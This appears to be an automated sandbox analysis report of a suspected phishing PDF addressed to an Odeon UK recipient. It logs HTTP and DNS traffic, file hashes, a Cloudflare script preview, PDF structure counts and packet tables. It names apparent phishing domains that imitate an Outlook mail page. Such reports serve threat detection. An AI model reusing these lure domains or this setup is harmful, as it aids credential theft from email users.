Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.odeon.co.ukConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/styles/cf.errors.css HTTP/1.1Host: www.odeon.co.ukConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.odeon.co.uk/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=nkAWqWWDt_CUbpAdoHc0ljQUuIjnZWTFp6IRTH5_i54-1733821610-1.0.1.1-tXMJjcCp6ajZm7T9QvC8w7Mi61.YbKD4PqIlRRWEhp4ke5lZuxrTq5QCY5j9uWmK0Orz7zzGGFQcBjv6vLC2hw
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1Host: www.odeon.co.ukConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=nkAWqWWDt_CUbpAdoHc0ljQUuIjnZWTFp6IRTH5_i54-1733821610-1.0.1.1-tXMJjcCp6ajZm7T9QvC8w7Mi61.YbKD4PqIlRRWEhp4ke5lZuxrTq5QCY5j9uWmK0Orz7zzGGFQcBjv6vLC2hw
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/images/browser-bar.png?1376755637 HTTP/1.1Host: www.odeon.co.ukConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.odeon.co.uk/cdn-cgi/styles/cf.errors.cssAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=nkAWqWWDt_CUbpAdoHc0ljQUuIjnZWTFp6IRTH5_i54-1733821610-1.0.1.1-tXMJjcCp6ajZm7T9QvC8w7Mi61.YbKD4PqIlRRWEhp4ke5lZuxrTq5QCY5j9uWmK0Orz7zzGGFQcBjv6vLC2hw
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/images/cf-no-screenshot-error.png HTTP/1.1Host: www.odeon.co.ukConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.odeon.co.uk/cdn-cgi/styles/cf.errors.cssAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=nkAWqWWDt_CUbpAdoHc0ljQUuIjnZWTFp6IRTH5_i54-1733821610-1.0.1.1-tXMJjcCp6ajZm7T9QvC8w7Mi61.YbKD4PqIlRRWEhp4ke5lZuxrTq5QCY5j9uWmK0Orz7zzGGFQcBjv6vLC2hw
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/scripts/jsd/f9063374b04d/main.js? HTTP/1.1Host: www.odeon.co.ukConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=nkAWqWWDt_CUbpAdoHc0ljQUuIjnZWTFp6IRTH5_i54-1733821610-1.0.1.1-tXMJjcCp6ajZm7T9QvC8w7Mi61.YbKD4PqIlRRWEhp4ke5lZuxrTq5QCY5j9uWmK0Orz7zzGGFQcBjv6vLC2hw
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/images/browser-bar.png?1376755637 HTTP/1.1Host: www.odeon.co.ukConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=nkAWqWWDt_CUbpAdoHc0ljQUuIjnZWTFp6IRTH5_i54-1733821610-1.0.1.1-tXMJjcCp6ajZm7T9QvC8w7Mi61.YbKD4PqIlRRWEhp4ke5lZuxrTq5QCY5j9uWmK0Orz7zzGGFQcBjv6vLC2hw
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/images/cf-no-screenshot-error.png HTTP/1.1Host: www.odeon.co.ukConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=nkAWqWWDt_CUbpAdoHc0ljQUuIjnZWTFp6IRTH5_i54-1733821610-1.0.1.1-tXMJjcCp6ajZm7T9QvC8w7Mi61.YbKD4PqIlRRWEhp4ke5lZuxrTq5QCY5j9uWmK0Orz7zzGGFQcBjv6vLC2hw
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/scripts/jsd/f9063374b04d/main.js? HTTP/1.1Host: www.odeon.co.ukConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=nkAWqWWDt_CUbpAdoHc0ljQUuIjnZWTFp6IRTH5_i54-1733821610-1.0.1.1-tXMJjcCp6ajZm7T9QvC8w7Mi61.YbKD4PqIlRRWEhp4ke5lZuxrTq5QCY5j9uWmK0Orz7zzGGFQcBjv6vLC2hw
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.odeon.co.ukConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.odeon.co.uk/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=nkAWqWWDt_CUbpAdoHc0ljQUuIjnZWTFp6IRTH5_i54-1733821610-1.0.1.1-tXMJjcCp6ajZm7T9QvC8w7Mi61.YbKD4PqIlRRWEhp4ke5lZuxrTq5QCY5j9uWmK0Orz7zzGGFQcBjv6vLC2hw
Source: global traffic	HTTP traffic detected: GET /assets/mail/illustrations/noMailSelected/v2/light.svg HTTP/1.1Host: res.public.onecdn.static.microsoftConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://eatnjyz20r.pdfimgviewer.top/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/jsd/r/8efc14cc593153fc HTTP/1.1Host: www.odeon.co.ukConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=nkAWqWWDt_CUbpAdoHc0ljQUuIjnZWTFp6IRTH5_i54-1733821610-1.0.1.1-tXMJjcCp6ajZm7T9QvC8w7Mi61.YbKD4PqIlRRWEhp4ke5lZuxrTq5QCY5j9uWmK0Orz7zzGGFQcBjv6vLC2hw
Source: global traffic	HTTP traffic detected: GET /mail/favicon.ico HTTP/1.1Host: outlook.office.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://eatnjyz20r.pdfimgviewer.top/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /mail/favicon.ico HTTP/1.1Host: outlook.office.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: odeonuk.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /r/r1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog

Source: global traffic	DNS traffic detected: DNS query: odeonuk.com
Source: global traffic	DNS traffic detected: DNS query: viewqr_img_7fyua1.tsbsky.top
Source: global traffic	DNS traffic detected: DNS query: www.odeon.co.uk
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: eatnjyz20r.pdfimgviewer.top
Source: global traffic	DNS traffic detected: DNS query: res.public.onecdn.static.microsoft
Source: global traffic	DNS traffic detected: DNS query: outlook.office.com
Source: global traffic	DNS traffic detected: DNS query: uzrr635v.bngme.top
Source: global traffic	DNS traffic detected: DNS query: _205._https.uzrr635v.bngme.top
Source: global traffic	DNS traffic detected: DNS query: google.com

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (8750), with no line terminators
Category:	downloaded
Size (bytes):	8750
Entropy (8bit):	5.749062539342851
Encrypted:	false
SSDEEP:	192:uabgCnZp40rKfovXgM6Me0BusORWJAXssjJYv6VS39TwAXn:uabDRnwiev3XblNVS39kA3
MD5:	D9561E737A0D8D3E2F8E93FCE09CF566
SHA1:	983590B3FBE6A8AE2914FB3D38309156B60588B9
SHA-256:	E9C7D27CF97D111809F30295A34E754F53FB394DD623D7DD11B4CA1C19A54DB1
SHA-512:	F9C72A1399EA9ACA0C577E6EFC95C4ED0F93574E0BE87883522209C3C376B0A60A0FB8522DB5B7D1E268E246D287927E7273B738767CA69F4B7D2CDA32015F42
Malicious:	false
URL:	https://www.odeon.co.uk/cdn-cgi/challenge-platform/h/g/scripts/jsd/f9063374b04d/main.js?
Preview:	window._cf_chl_opt={cFPWv:'g'};~function(W,h,i,j,k,l,s,v){W=b,function(c,e,V,f,g){for(V=b,f=c();!![];)try{if(g=parseInt(V(461))/1+parseInt(V(427))/2+parseInt(V(445))/3(-parseInt(V(460))/4)+parseInt(V(470))/5+parseInt(V(435))/6(parseInt(V(485))/7)+parseInt(V(510))/8(-parseInt(V(442))/9)+parseInt(V(464))/10(-parseInt(V(411))/11),g===e)break;else f.push(f.shift())}catch(E){f.push(f.shift())}}(a,106823),h=this\|\|self,i=h[W(508)],j=function(X,e,f,g){return X=W,e=String[X(433)],f={'h':function(E){return E==null?'':f.g(E,6,function(F,Y){return Y=b,Y(488)[Y(405)](F)})},'g':function(E,F,G,Z,H,I,J,K,L,M,N,O,P,Q,R,S,T,U){if(Z=X,E==null)return'';for(I={},J={},K='',L=2,M=3,N=2,O=[],P=0,Q=0,R=0;R<E[Z(520)];R+=1)if(S=E[Z(405)](R),Object[Z(497)][Z(409)][Z(491)](I,S)\|\|(I[S]=M++,J[S]=!0),T=K+S,Object[Z(497)][Z(409)][Z(491)](I,T))K=T;else{if(Object[Z(497)][Z(409)][Z(491)](J,K)){if(256>K[Z(466)](0)){for(H=0;H<N;P<<=1,F-1==Q?(Q=0,O[Z(450)](G(P)),P=0):Q++,H++);for(U=K[Z(466)](0),H=0;8>H;P=1.4&U\|P<<1,F-1=

File type:	PDF document, version 1.4, 1 pages
Entropy (8bit):	7.653880118955074
TrID:	Adobe Portable Document Format (5005/1) 100.00%
File name:	letter_sjoslin_odeonuk.com.pdf
File size:	52'230 bytes
MD5:	bbf84d026aa11a00e09ffd06673bf307
SHA1:	28fb29814a8b4e96372ea7a94a19fb2b32960873
SHA256:	2c2db8df44fe18e47299e7d3ebdc34cd4a1e72dc5ebc11e8e73a8d2765a2a2f5
SHA512:	17107da8e1218949935c237443ba17707c49211f21a1bf184c694730bd5f588d33d5ff6a466ca7ac6b1916d16d464da938da95634bfe0f460f7323857fc5da88
SSDEEP:	768:nPMvDkwZ9Rk1bwE8SEjimAw6eCA3CK9OSK2FGfcXjdGGfCOTAm/wDkrwEmzlr5O0:qDg1b/atAwYKOSKZfw5GGxTAzzRs1m
TLSH:	93338D3BDDC82C8CF8C3C98C957778EC453CF26792C5A4E264288B25B4564996F73A87
File Content Preview:	%PDF-1.4.1 0 obj.<<./Title (..)./Creator (..)./Producer (...Q.t. .5...5...1)./CreationDate (D:20241206015445).>>.endobj.2 0 obj.<<./Type /Catalog./Pages 3 0 R.>>.endobj.4 0 obj.<<./Type /ExtGState./SA true./SM 0.02./ca 1.0./CA 1.0./AIS false./SMask /None>

General
Header:	%PDF-1.4
Total Entropy:	7.653880
Total Bytes:	52230
Stream Entropy:	7.947021
Stream Bytes:	39455
Entropy outside Streams:	4.977608
Bytes outside Streams:	12775
Number of EOF found:	1
Bytes after EOF:

Name	Count
obj	86
endobj	78
stream	10
endstream	10
xref	1
trailer	1
startxref	1
/Page	1
/Encrypt	0
/ObjStm	0
/URI	2
/JS	0
/JavaScript	0
/AA	0
/OpenAction	0
/AcroForm	0
/JBIG2Decode	0
/RichMedia	0
/Launch	0
/EmbeddedFile	0

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 10, 2024 10:06:13.401324987 CET	137	137	192.168.11.20	192.168.11.255
Dec 10, 2024 10:06:14.160948038 CET	137	137	192.168.11.20	192.168.11.255
Dec 10, 2024 10:06:14.926445961 CET	137	137	192.168.11.20	192.168.11.255
Dec 10, 2024 10:06:46.569200993 CET	54584	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:06:46.569309950 CET	56689	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:06:46.681984901 CET	53	63903	1.1.1.1	192.168.11.20
Dec 10, 2024 10:06:46.698842049 CET	58452	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:06:46.698920965 CET	55451	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:06:46.714391947 CET	53	56689	1.1.1.1	192.168.11.20
Dec 10, 2024 10:06:46.728394985 CET	55452	1900	192.168.11.20	239.255.255.250
Dec 10, 2024 10:06:46.743603945 CET	53507	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:06:46.743699074 CET	59438	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:06:46.745595932 CET	53	54584	1.1.1.1	192.168.11.20
Dec 10, 2024 10:06:46.806190014 CET	53	60580	1.1.1.1	192.168.11.20
Dec 10, 2024 10:06:46.816018105 CET	53	58452	1.1.1.1	192.168.11.20
Dec 10, 2024 10:06:46.834971905 CET	53	55451	1.1.1.1	192.168.11.20
Dec 10, 2024 10:06:46.871881008 CET	53	53507	1.1.1.1	192.168.11.20
Dec 10, 2024 10:06:46.921427965 CET	53	59438	1.1.1.1	192.168.11.20
Dec 10, 2024 10:06:47.551403046 CET	53	59617	1.1.1.1	192.168.11.20
Dec 10, 2024 10:06:47.740045071 CET	55452	1900	192.168.11.20	239.255.255.250
Dec 10, 2024 10:06:48.741089106 CET	55452	1900	192.168.11.20	239.255.255.250
Dec 10, 2024 10:06:49.364247084 CET	53	60487	1.1.1.1	192.168.11.20
Dec 10, 2024 10:06:49.742264032 CET	55452	1900	192.168.11.20	239.255.255.250
Dec 10, 2024 10:06:50.033113956 CET	60781	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:06:50.033191919 CET	50233	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:06:50.262957096 CET	53	60781	1.1.1.1	192.168.11.20
Dec 10, 2024 10:06:50.273228884 CET	53	50233	1.1.1.1	192.168.11.20
Dec 10, 2024 10:06:51.263777018 CET	55339	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:06:51.263952017 CET	58559	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:06:51.378500938 CET	53	58559	1.1.1.1	192.168.11.20
Dec 10, 2024 10:06:51.378766060 CET	53	55339	1.1.1.1	192.168.11.20
Dec 10, 2024 10:06:52.136729956 CET	64066	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:06:52.136869907 CET	50985	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:06:52.291637897 CET	53	64066	1.1.1.1	192.168.11.20
Dec 10, 2024 10:06:52.292771101 CET	53	50985	1.1.1.1	192.168.11.20
Dec 10, 2024 10:06:52.471698046 CET	57677	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:06:52.471817017 CET	59102	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:06:52.589704037 CET	53	59102	1.1.1.1	192.168.11.20
Dec 10, 2024 10:06:52.690337896 CET	53	57677	1.1.1.1	192.168.11.20
Dec 10, 2024 10:06:53.432009935 CET	55018	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:06:53.432077885 CET	62337	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:06:54.324038029 CET	59499	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:06:54.324142933 CET	52697	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:06:54.327560902 CET	65035	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:06:54.327656031 CET	65219	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:06:54.441957951 CET	53	65035	1.1.1.1	192.168.11.20
Dec 10, 2024 10:06:54.442219973 CET	53	65219	1.1.1.1	192.168.11.20
Dec 10, 2024 10:06:55.288192034 CET	55307	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:06:55.288310051 CET	59028	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:06:55.402467012 CET	53	55307	1.1.1.1	192.168.11.20
Dec 10, 2024 10:06:55.402688980 CET	53	59028	1.1.1.1	192.168.11.20
Dec 10, 2024 10:06:56.381223917 CET	53	53074	1.1.1.1	192.168.11.20
Dec 10, 2024 10:06:59.340123892 CET	57095	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:06:59.340236902 CET	61144	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:06:59.346029043 CET	58576	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:06:59.346086979 CET	58837	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:06:59.473407030 CET	53	57095	1.1.1.1	192.168.11.20
Dec 10, 2024 10:06:59.473608017 CET	53	61144	1.1.1.1	192.168.11.20
Dec 10, 2024 10:06:59.474267006 CET	64188	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:06:59.479322910 CET	53	58576	1.1.1.1	192.168.11.20
Dec 10, 2024 10:06:59.479363918 CET	53	58837	1.1.1.1	192.168.11.20
Dec 10, 2024 10:06:59.608047009 CET	53	64188	1.1.1.1	192.168.11.20
Dec 10, 2024 10:06:59.623559952 CET	52220	53	192.168.11.20	8.8.8.8
Dec 10, 2024 10:06:59.623747110 CET	52154	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:06:59.737946033 CET	53	52154	1.1.1.1	192.168.11.20
Dec 10, 2024 10:06:59.739664078 CET	53	52220	8.8.8.8	192.168.11.20
Dec 10, 2024 10:07:00.633255005 CET	49909	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:07:00.633326054 CET	59249	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:07:00.748389006 CET	53	49909	1.1.1.1	192.168.11.20
Dec 10, 2024 10:07:00.748426914 CET	53	59249	1.1.1.1	192.168.11.20
Dec 10, 2024 10:07:05.756845951 CET	62165	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:07:05.756922960 CET	58504	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:07:05.871881962 CET	53	62165	1.1.1.1	192.168.11.20
Dec 10, 2024 10:07:05.890665054 CET	53	58504	1.1.1.1	192.168.11.20
Dec 10, 2024 10:07:05.891280890 CET	64036	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:07:06.006972075 CET	53	64036	1.1.1.1	192.168.11.20
Dec 10, 2024 10:07:09.444727898 CET	53	58950	1.1.1.1	192.168.11.20
Dec 10, 2024 10:07:16.437659979 CET	53	64820	1.1.1.1	192.168.11.20
Dec 10, 2024 10:07:27.491482019 CET	52346	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:07:27.625212908 CET	53	52346	1.1.1.1	192.168.11.20
Dec 10, 2024 10:07:31.433862925 CET	53	50213	1.1.1.1	192.168.11.20
Dec 10, 2024 10:07:36.026654959 CET	55584	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:07:36.026654959 CET	61706	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:07:36.141767979 CET	53	55584	1.1.1.1	192.168.11.20
Dec 10, 2024 10:07:36.160101891 CET	53	61706	1.1.1.1	192.168.11.20
Dec 10, 2024 10:07:36.160890102 CET	63746	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:07:36.275438070 CET	53	63746	1.1.1.1	192.168.11.20
Dec 10, 2024 10:07:46.720160007 CET	53	63356	1.1.1.1	192.168.11.20
Dec 10, 2024 10:07:49.477283001 CET	63507	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:07:49.592262030 CET	53	63507	1.1.1.1	192.168.11.20
Dec 10, 2024 10:07:57.309458017 CET	53	63345	1.1.1.1	192.168.11.20
Dec 10, 2024 10:07:58.666639090 CET	138	138	192.168.11.20	192.168.11.255
Dec 10, 2024 10:08:15.362312078 CET	56569	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:08:15.477885008 CET	53	56569	1.1.1.1	192.168.11.20
Dec 10, 2024 10:08:30.427346945 CET	53	51615	1.1.1.1	192.168.11.20
Dec 10, 2024 10:08:36.283711910 CET	56204	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:08:36.283711910 CET	59757	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:08:36.416990042 CET	53	56204	1.1.1.1	192.168.11.20
Dec 10, 2024 10:08:36.417303085 CET	53	59757	1.1.1.1	192.168.11.20
Dec 10, 2024 10:08:36.417836905 CET	49646	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:08:36.532682896 CET	53	49646	1.1.1.1	192.168.11.20
Dec 10, 2024 10:08:46.568880081 CET	54335	1900	192.168.11.20	239.255.255.250
Dec 10, 2024 10:08:47.582372904 CET	54335	1900	192.168.11.20	239.255.255.250
Dec 10, 2024 10:08:48.597836971 CET	54335	1900	192.168.11.20	239.255.255.250
Dec 10, 2024 10:08:49.613373041 CET	54335	1900	192.168.11.20	239.255.255.250
Dec 10, 2024 10:09:06.154259920 CET	63785	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:09:06.154292107 CET	61413	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:09:06.287324905 CET	53	61413	1.1.1.1	192.168.11.20
Dec 10, 2024 10:09:06.288232088 CET	53	63785	1.1.1.1	192.168.11.20
Dec 10, 2024 10:09:06.288877964 CET	62363	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:09:06.403811932 CET	53	62363	1.1.1.1	192.168.11.20
Dec 10, 2024 10:09:06.409885883 CET	58440	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:09:06.409914970 CET	62459	53	192.168.11.20	8.8.8.8
Dec 10, 2024 10:09:06.525362015 CET	53	58440	1.1.1.1	192.168.11.20
Dec 10, 2024 10:09:06.529331923 CET	53	62459	8.8.8.8	192.168.11.20
Dec 10, 2024 10:09:19.694708109 CET	53	58141	1.1.1.1	192.168.11.20
Dec 10, 2024 10:09:37.716279030 CET	59807	53	192.168.11.20	1.1.1.1
Dec 10, 2024 10:09:37.831060886 CET	53	59807	1.1.1.1	192.168.11.20

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 10:06:49.873051882 CET	426	OUT	GET / HTTP/1.1 Host: odeonuk.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Dec 10, 2024 10:06:50.030874014 CET	124	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 10 Dec 2024 09:06:49 GMT Location: http://www.odeon.co.uk Content-Length: 0

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 10:06:53.395386934 CET	200	OUT	GET /r/r1.crl HTTP/1.1 Cache-Control: max-age = 3000 Connection: Keep-Alive Accept: / If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT User-Agent: Microsoft-CryptoAPI/10.0 Host: c.pki.goog
Dec 10, 2024 10:06:53.510284901 CET	223	IN	HTTP/1.1 304 Not Modified Date: Tue, 10 Dec 2024 08:48:06 GMT Expires: Tue, 10 Dec 2024 09:38:06 GMT Age: 1127 Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT Cache-Control: public, max-age=3000 Vary: Accept-Encoding

Timestamp	Bytes transferred	Direction	Data
